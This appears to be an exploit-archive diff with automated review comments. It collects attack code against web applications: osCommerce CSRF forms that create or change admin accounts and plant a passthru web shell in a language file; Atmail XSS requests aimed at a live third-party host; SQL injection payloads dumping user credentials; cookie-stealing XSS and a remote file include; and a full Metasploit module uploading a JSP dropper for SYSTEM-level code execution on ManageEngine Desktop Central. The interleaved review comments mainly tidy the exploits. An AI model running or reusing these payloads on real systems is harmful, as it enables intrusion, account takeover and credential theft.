<input type="hidden" name="entry_country_id" value="5" />
<input type="hidden" name="customers_telephone" value="123456792" />
<input type="hidden" name="customers_fax" value="" />
<input type="hidden" name="customers_newsletter" value="1" />
<input type="submit" value="Go" />
</form>
</body>
</html>
- Add / Edit / Delete admin
Add admin account:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?action=insert" method="POST">
<input type="hidden" name="username" value="haxor" />
<input type="hidden" name="password" value="pwned" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Change admin (set new password):
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=1&action=save" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="newpass" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remove admin:
localhost/osc/oscommerce-2.3.4/catalog/admin/administrators.php?aID=2&action=deleteconfirm
- RCE via CSRF -> Define Languages
It is able to change content of specific file in 'define languages' tab, we're gonna use default english language, and so default files path. File MUST be writable. Value stands for english.php default content; as you can notice, passthru function is being included.
localhost/osc/oscommerce-2.3.4/catalog/includes/languages/english.php?cmd=uname -a
PoC:
<html>
<body>
<form action="http://localhost/osc/oscommerce-2.3.4/catalog/admin/define_language.php?lngdir=english&filename=english.php&action=save" method="POST">
<input type="hidden" name="file_contents" value="<?php
/*
$Id$
osCommerce, Open Source E-Commerce Solutions
http://www.oscommerce.com
Copyright (c) 2013 osCommerce
Released under the GNU General Public License
*/
// look in your $PATH_LOCALE/locale directory for available locales
// or type locale -a on the server.
// Examples:
// on RedHat try 'en_US'
// on FreeBSD try 'en_US.ISO_8859-1'
// on Windows try 'en', or 'English'
@setlocale(LC_ALL, array('en_US.UTF-8', 'en_US.UTF8', 'enu_usa'));
define('DATE_FORMAT_SHORT', '%m/%d/%Y'); // this is used for strftime()
define('DATE_FORMAT_LONG', '%A %d %B, %Y'); // this is used for strftime()
define('DATE_FORMAT', 'm/d/Y'); // this is used for date()
define('DATE_TIME_FORMAT', DATE_FORMAT_SHORT . ' %H:%M:%S');
define('JQUERY_DATEPICKER_I18N_CODE', ''); // leave empty for en_US; see http://jqueryui.com/demos/datepicker/#localization
define('JQUERY_DATEPICKER_FORMAT', 'mm/dd/yy'); // see http://docs.jquery.com/UI/Datepicker/formatDate
@passthru($_GET['cmd']);
////
// Return date in raw format
// $date should be in format mm/dd/yyyy
// raw date is in format YYYYMMDD, or DDMMYYYY
function tep_date_raw($date, $reverse = false) {
if ($reverse) {
return substr($date, 3, 2) . substr($date, 0, 2) . substr($date, 6, 4);
} else {
return substr($date, 6, 4) . substr($date, 0, 2) . substr($date, 3, 2);
}
}
// if USE_DEFAULT_LANGUAGE_CURRENCY is true, use the following currency, instead of the applications default currency (used when changing language)
define('LANGUAGE_CURRENCY', 'USD');
// Global entries for the <html> tag
define('HTML_PARAMS', 'dir="ltr" lang="en"');
// charset for web pages and emails
define('CHARSET', 'utf-8');
// page title
define('TITLE', STORE_NAME);
// header text in includes/header.php
define('HEADER_TITLE_CREATE_ACCOUNT', 'Create an Account');
define('HEADER_TITLE_MY_ACCOUNT', 'My Account');
define('HEADER_TITLE_CART_CONTENTS', 'Cart Contents');
define('HEADER_TITLE_CHECKOUT', 'Checkout');
define('HEADER_TITLE_TOP', 'Top');
define('HEADER_TITLE_CATALOG', 'Catalog');
define('HEADER_TITLE_LOGOFF', 'Log Off');
define('HEADER_TITLE_LOGIN', 'Log In');
// footer text in includes/footer.php
define('FOOTER_TEXT_REQUESTS_SINCE', 'requests since');
// text for gender
define('MALE', 'Male');
define('FEMALE', 'Female');
define('MALE_ADDRESS', 'Mr.');
define('FEMALE_ADDRESS', 'Ms.');
// text for date of birth example
define('DOB_FORMAT_STRING', 'mm/dd/yyyy');
// checkout procedure text
define('CHECKOUT_BAR_DELIVERY', 'Delivery Information');
define('CHECKOUT_BAR_PAYMENT', 'Payment Information');
define('CHECKOUT_BAR_CONFIRMATION', 'Confirmation');
define('CHECKOUT_BAR_FINISHED', 'Finished!');
// pull down default text
define('PULL_DOWN_DEFAULT', 'Please Select');
define('TYPE_BELOW', 'Type Below');
// javascript messages
define('JS_ERROR', 'Errors have occured during the process of your form.\n\nPlease make the following corrections:\n\n');
define('JS_REVIEW_TEXT', '* The \'Review Text\' must have at least ' . REVIEW_TEXT_MIN_LENGTH . ' characters.\n');
define('JS_REVIEW_RATING', '* You must rate the product for your review.\n');
define('JS_ERROR_NO_PAYMENT_MODULE_SELECTED', '* Please select a payment method for your order.\n');
define('JS_ERROR_SUBMITTED', 'This form has already been submitted. Please press Ok and wait for this process to be completed.');
define('ERROR_NO_PAYMENT_MODULE_SELECTED', 'Please select a payment method for your order.');
define('CATEGORY_COMPANY', 'Company Details');
define('CATEGORY_PERSONAL', 'Your Personal Details');
define('CATEGORY_ADDRESS', 'Your Address');
define('CATEGORY_CONTACT', 'Your Contact Information');
define('CATEGORY_OPTIONS', 'Options');
define('CATEGORY_PASSWORD', 'Your Password');
define('ENTRY_COMPANY', 'Company Name:');
define('ENTRY_COMPANY_TEXT', '');
define('ENTRY_GENDER', 'Gender:');
define('ENTRY_GENDER_ERROR', 'Please select your Gender.');
define('ENTRY_GENDER_TEXT', '*');
define('ENTRY_FIRST_NAME', 'First Name:');
define('ENTRY_FIRST_NAME_ERROR', 'Your First Name must contain a minimum of ' . ENTRY_FIRST_NAME_MIN_LENGTH . ' characters.');
define('ENTRY_FIRST_NAME_TEXT', '*');
define('ENTRY_LAST_NAME', 'Last Name:');
define('ENTRY_LAST_NAME_ERROR', 'Your Last Name must contain a minimum of ' . ENTRY_LAST_NAME_MIN_LENGTH . ' characters.');
define('ENTRY_LAST_NAME_TEXT', '*');
define('ENTRY_DATE_OF_BIRTH', 'Date of Birth:');
define('ENTRY_DATE_OF_BIRTH_ERROR', 'Your Date of Birth must be in this format: MM/DD/YYYY (eg 05/21/1970)');
define('ENTRY_DATE_OF_BIRTH_TEXT', '* (eg. 05/21/1970)');
define('ENTRY_EMAIL_ADDRESS', 'E-Mail Address:');
define('ENTRY_EMAIL_ADDRESS_ERROR', 'Your E-Mail Address must contain a minimum of ' . ENTRY_EMAIL_ADDRESS_MIN_LENGTH . ' characters.');
define('ENTRY_EMAIL_ADDRESS_CHECK_ERROR', 'Your E-Mail Address does not appear to be valid - please make any necessary corrections.');
define('ENTRY_EMAIL_ADDRESS_ERROR_EXISTS', 'Your E-Mail Address already exists in our records - please log in with the e-mail address or create an account with a different address.');
define('ENTRY_EMAIL_ADDRESS_TEXT', '*');
define('ENTRY_STREET_ADDRESS', 'Street Address:');
define('ENTRY_STREET_ADDRESS_ERROR', 'Your Street Address must contain a minimum of ' . ENTRY_STREET_ADDRESS_MIN_LENGTH . ' characters.');
define('ENTRY_STREET_ADDRESS_TEXT', '*');
define('ENTRY_SUBURB', 'Suburb:');
define('ENTRY_SUBURB_TEXT', '');
define('ENTRY_POST_CODE', 'Post Code:');
define('ENTRY_POST_CODE_ERROR', 'Your Post Code must contain a minimum of ' . ENTRY_POSTCODE_MIN_LENGTH . ' characters.');
define('ENTRY_POST_CODE_TEXT', '*');
define('ENTRY_CITY', 'City:');
define('ENTRY_CITY_ERROR', 'Your City must contain a minimum of ' . ENTRY_CITY_MIN_LENGTH . ' characters.');
define('ENTRY_CITY_TEXT', '*');
define('ENTRY_STATE', 'State/Province:');
define('ENTRY_STATE_ERROR', 'Your State must contain a minimum of ' . ENTRY_STATE_MIN_LENGTH . ' characters.');
define('ENTRY_STATE_ERROR_SELECT', 'Please select a state from the States pull down menu.');
define('ENTRY_STATE_TEXT', '*');
define('ENTRY_COUNTRY', 'Country:');
define('ENTRY_COUNTRY_ERROR', 'You must select a country from the Countries pull down menu.');
define('ENTRY_COUNTRY_TEXT', '*');
define('ENTRY_TELEPHONE_NUMBER', 'Telephone Number:');
define('ENTRY_TELEPHONE_NUMBER_ERROR', 'Your Telephone Number must contain a minimum of ' . ENTRY_TELEPHONE_MIN_LENGTH . ' characters.');
define('ENTRY_TELEPHONE_NUMBER_TEXT', '*');
define('ENTRY_FAX_NUMBER', 'Fax Number:');
define('ENTRY_FAX_NUMBER_TEXT', '');
define('ENTRY_NEWSLETTER', 'Newsletter:');
define('ENTRY_NEWSLETTER_TEXT', '');
define('ENTRY_NEWSLETTER_YES', 'Subscribed');
define('ENTRY_NEWSLETTER_NO', 'Unsubscribed');
define('ENTRY_PASSWORD', 'Password:');
define('ENTRY_PASSWORD_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
define('ENTRY_PASSWORD_ERROR_NOT_MATCHING', 'The Password Confirmation must match your Password.');
define('ENTRY_PASSWORD_TEXT', '*');
define('ENTRY_PASSWORD_CONFIRMATION', 'Password Confirmation:');
define('ENTRY_PASSWORD_CONFIRMATION_TEXT', '*');
define('ENTRY_PASSWORD_CURRENT', 'Current Password:');
define('ENTRY_PASSWORD_CURRENT_TEXT', '*');
define('ENTRY_PASSWORD_CURRENT_ERROR', 'Your Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
define('ENTRY_PASSWORD_NEW', 'New Password:');
define('ENTRY_PASSWORD_NEW_TEXT', '*');
define('ENTRY_PASSWORD_NEW_ERROR', 'Your new Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
define('ENTRY_PASSWORD_NEW_ERROR_NOT_MATCHING', 'The Password Confirmation must match your new Password.');
define('PASSWORD_HIDDEN', '--HIDDEN--');
define('FORM_REQUIRED_INFORMATION', '* Required information');
// constants for use in tep_prev_next_display function
define('TEXT_RESULT_PAGE', 'Result Pages:');
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> products)');
define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> orders)');
define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> reviews)');
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> new products)');
define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> specials)');
define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page');
define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page');
define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page');
define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page');
define('PREVNEXT_TITLE_PAGE_NO', 'Page %d');
define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages');
define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages');
define('PREVNEXT_BUTTON_FIRST', '<<FIRST');
define('PREVNEXT_BUTTON_PREV', '[<<&nbsp;Prev]');
define('PREVNEXT_BUTTON_NEXT', '[Next&nbsp;>>]');
define('PREVNEXT_BUTTON_LAST', 'LAST>>');
define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address');
define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book');
define('IMAGE_BUTTON_BACK', 'Back');
define('IMAGE_BUTTON_BUY_NOW', 'Buy Now');
define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address');
define('IMAGE_BUTTON_CHECKOUT', 'Checkout');
define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order');
define('IMAGE_BUTTON_CONTINUE', 'Continue');
define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping');
define('IMAGE_BUTTON_DELETE', 'Delete');
define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account');
define('IMAGE_BUTTON_HISTORY', 'Order History');
define('IMAGE_BUTTON_LOGIN', 'Sign In');
define('IMAGE_BUTTON_IN_CART', 'Add to Cart');
define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications');
define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find');
define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications');
define('IMAGE_BUTTON_REVIEWS', 'Reviews');
define('IMAGE_BUTTON_SEARCH', 'Search');
define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options');
define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend');
define('IMAGE_BUTTON_UPDATE', 'Update');
define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart');
define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review');
define('SMALL_IMAGE_BUTTON_DELETE', 'Delete');
define('SMALL_IMAGE_BUTTON_EDIT', 'Edit');
define('SMALL_IMAGE_BUTTON_VIEW', 'View');
define('ICON_ARROW_RIGHT', 'more');
define('ICON_CART', 'In Cart');
define('ICON_ERROR', 'Error');
define('ICON_SUCCESS', 'Success');
define('ICON_WARNING', 'Warning');
define('TEXT_GREETING_PERSONAL', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');
define('TEXT_GREETING_PERSONAL_RELOGON', '<small>If you are not %s, please <a href="%s"><u>log yourself in</u></a> with your account information.</small>');
define('TEXT_GREETING_GUEST', 'Welcome <span class="greetUser">Guest!</span> Would you like to <a href="%s"><u>log yourself in</u></a>? Or would you prefer to <a href="%s"><u>create an account</u></a>?');
define('TEXT_SORT_PRODUCTS', 'Sort products ');
define('TEXT_DESCENDINGLY', 'descendingly');
define('TEXT_ASCENDINGLY', 'ascendingly');
define('TEXT_BY', ' by ');
define('TEXT_REVIEW_BY', 'by %s');
define('TEXT_REVIEW_WORD_COUNT', '%s words');
define('TEXT_REVIEW_RATING', 'Rating: %s [%s]');
define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s');
define('TEXT_NO_REVIEWS', 'There are currently no product reviews.');
define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.');
define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate');
define('TEXT_REQUIRED', '<span class="errorText">Required</span>');
define('ERROR_TEP_MAIL', '<font face="Verdana, Arial" size="2" color="#ff0000"><strong><small>TEP ERROR:</small> Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.</strong></font>');
define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.');
define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.');
define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.');
define('FOOTER_TEXT_BODY', 'Copyright &copy; ' . date('Y') . ' <a href="' . tep_href_link(FILENAME_DEFAULT) . '">' . STORE_NAME . '</a><br />Powered by <a href="http://www.oscommerce.com" target="_blank">osCommerce</a>');
?>
" />
<input type="submit" value="Go" />
</form>
</body>
</html>
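Review bot: The header `#Affected versions: => 2.3.4 (latest atm)` is ambiguous — `=>` reads as "2.3.4 and later", which contradicts "latest"; presumably `<= 2.3.4` is meant and it should be written that way (the Atmail advisory's `#Version: =>7.2` has the same problem). Items 2–5 are titled "Persistent XSS via CSRF" but describe two separable weaknesses — the admin `action=insert` handlers accept a cross-origin POST with no request token (the Zen Cart requests above carry a `securityToken` parameter, presumably for that purpose), and the stored values are echoed unescaped — and naming both would tell a reader that a token check on the admin forms and output encoding are each needed to close the items. Every admin-side PoC, including the administrator and `define_language.php` ones at the end, only works while the victim holds an authenticated admin session, which the text leaves implicit. Typos: `visitd` (twice) and `langauges`.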

80
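--- a/platforms/php/webapps/34585.txt
+++ b/platforms/php/webapps/34585.txt
@@ -0,0 +1,80 @@
+#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
+#Date: 01.27.2014
+#Vendor: atmail.com
+#Version: =>7.2 (Latest ATM), tested also on 7.1.1
+#Authors: Smash_ & Brag / smash[at]devilteam.pl
+#PoC: poczta.pl / demo.atmail.com
+1. Cross Site Scripting
+a) GET - viewmessageTabNumber
+Request:
+host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
+Injection point (line 16):
+<input type="hidden" name="tabId" value="viewmessageTab3"><h1>XSS<!--
+PoC:
+https://www.poczta.pl/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
+b) POST - filter
+POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX.666/resultContext/searchResultsTab1 HTTP/1.1
+Host: www.poczta.pl
+searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<script>alert(666)</script>
+Alert will appear; injection point:
+<div id=\"noMessageDisplay\" style=\"margin:10px;\">\n\t\t\t\tFound no messages matching <script>alert(666) (...)
+c) POST - Search Results Tab
+Request:
+POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab1"%20whats="up"%20bad=" HTTP/1.1
+Host: http://www.poczta.pl
+Injection point:
+<input type=\"hidden\" name=\"resultContext\" id=\"resultContext\" value=\"searchResultsTab1\" whats=\"up\" bad=\"\" \/>
+d) POST - page
+Request:
+POST /mail/index.php/mail/mail/listfoldermessages/selectFolder/INBOX/page/2"%20xss="true"%20bad=" HTTP/1.1
+Host: www.poczta.pl
+Injection point:
+<input type=\"hidden\" name=\"pageNumber\" id=\"pageNumber\" value=\"2\" xss=\"true\" bad=\"\" \/>
+2. Full Path Disclosure
+Request (GET):
+demo.atmail.com/mail/index.php/mail/mail/listfoldermessages/
+Response:
+An error occurred
+script 'mail/listfoldermessages.phtml' not found in path (/usr/local/atmail/webmail/application/modules/mail/views/scripts/)
+3. Persistent XSS - Theme Color
+Request:
+GET /mail/index.php/mail/settings/webmailsave?fields%5BcssColorTheme%5D=purple"%20onload=alert(666)%20bad="&save=1 HTTP/1.1
+Host: www.poczta.pl
+Now, whenever someone will login alert will appear.
+Injection point:
+<body class="leaderboard-ad-off footer-ad-off '"XSS fresh blue" onload=alert(666) bad="" id="calon">
+4. Persistent XSS - Forward a Message
+First, compose your message and attach an image. Image name should consist
+JS code, for example: "><img src=x onerror=prompt(1)>.
+Send message to a victim, whenever someone will 'Forward' the message,
+JS will be executed:
+<a class=\"attach-btn\" href=\"#\" onClick=\"removeAttachment('bobs.\\\"><img src=x onerror=prompt(1)> (...)
+P.S - Login and password are sent as plaintext.
+... which is bad.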
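Review bot: The PoC requests for items 1a–1d and 3 point at a live third-party deployment (`www.poczta.pl`) instead of a placeholder host, unlike the `www.example.com` convention the other advisories in this commit follow; they should be rewritten to the `host/...` form the first request line already uses. The item 1c request also has `Host: http://www.poczta.pl`, which is not a valid Host header value (no scheme belongs there) and should read `Host: www.poczta.pl` like the others. The closing `Login and password are sent as plaintext` does not say whether the demo host simply lacks TLS or the application posts credentials over HTTP regardless of deployment; one sentence stating which would make it actionable. Typo: `should consist JS code` → `should consist of JS code`.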

12
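--- a/platforms/php/webapps/34596.txt
+++ b/platforms/php/webapps/34596.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/42967/info
+Pligg CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+Pligg CMS 1.0.4 is vulnerable; other versions may also be affected.
+The following example URIs are available:
+http://www.example.com//pliggcms_1_0_4/login.php?email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f
+http://www.example.com/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search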


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42973/info
Datetopia Buy Dating Site is prone to a cross-site scripting vulnerability because the it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/profile.php?profile_id=568&s_r="><script>alert(document.cookie);</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42974/info
SZNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
SZNews 2.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/printnews.php3?id=[shell.txt?]

14
platforms/php/webapps/34599.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/42975/info
HotelBook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
http://www.example.com/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
http://www.example.com/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
http://www.example.com/photos.php?hotel_id=1' << SQL >>
http://www.example.com/map.php?hotel_id=1' << SQL >>
http://www.example.com/weather.php?hotel_id=1' << SQL >>
http://www.example.com/reviews.php?hotel_id=1' << SQL >>
http://www.example.com/book.php?hotel_id=1' << SQL >>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42976/info
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/edit_profile.php?important="><script>alert(document.cookie);</script>


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42976/info
Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/report.php?pid="><script>alert(document.cookie);</script>


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/42993/info
Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.
An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.
Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.
This issue affects Internet Explorer 6, 7, and 8.
<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>

169
platforms/windows/remote/34594.rb Executable file

@ -0,0 +1,169 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral
v7 to v9 build 90054 (including the MSP versions).
A malicious user can upload a JSP file into the web root without authentication, leading to
arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as
they do not ship with a bundled Java compiler.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-5005'],
['OSVDB', '110643'],
['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'
))
register_options([Opt::RPORT(8020)], self.class)
end
# Test for Desktop Central
def check
res = send_request_cgi({
'uri' => normalize_uri("configurations.do"),
'method' => 'GET'
})
if res && res.code == 200
build = nil
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
print_status("#{peer} - Detected Desktop Central v7")
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
build = $1
print_status("#{peer} - Detected Desktop Central v8 #{build}")
else # DC v8 (earlier versions)
print_status("#{peer} - Detected Desktop Central v8")
end
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
build = $1
end
if build.nil?
return Exploit::CheckCode::Unknown
elsif Gem::Version.new(build) < Gem::Version.new("90055")
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Uploading JSP to execute the payload")
exe = payload.encoded_exe
exe_filename = rand_text_alpha_lower(8) + ".exe"
jsp_payload = jsp_drop_and_execute(exe, exe_filename)
jsp_name = rand_text_alpha_lower(8) + ".jsp"
send_request_cgi({
'uri' => normalize_uri('statusUpdate'),
'method' => 'POST',
'data' => jsp_payload,
'ctype' => 'text/html',
'vars_get' => {
'actionToCall' => 'LFU',
'configDataID' => '1',
'customerId' => rand_text_numeric(4),
'fileName' => '../' * 6 << jsp_name
}
})
# We could check for HTTP 200 and a "success" string.
# However only some later v8 and v9 versions return this; and we don't really care
# and do a GET to the file we just uploaded anyway.
register_files_for_cleanup(exe_filename)
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}")
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|\n|
jspraw << %Q|<%\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_drop_and_execute(bin_data, output_file)
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
end
end
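Review bot: In `check` the `buildNum` pattern is written out twice (v8 and v9 branches) and its capture is read through the global `$1`, while `res.body.to_s` is recomputed in every condition; a single `body = res.body.to_s` at the top of the method and one hoisted pattern would make the version-detection logic easier to follow. Something like `BUILD_RE = /id="buildNum" value="(?<build>[0-9]+)"\/>/.freeze` at class level with `build = Regexp.last_match(:build) if body =~ BUILD_RE` in both branches keeps the behaviour and drops the repeated regex and the `$1` reads. The `'../' * 6 << jsp_name` expression in `exploit` also reads more clearly as plain interpolation, `"#{'../' * 6}#{jsp_name}"`, since the `<<` mutates a temporary that nothing else references.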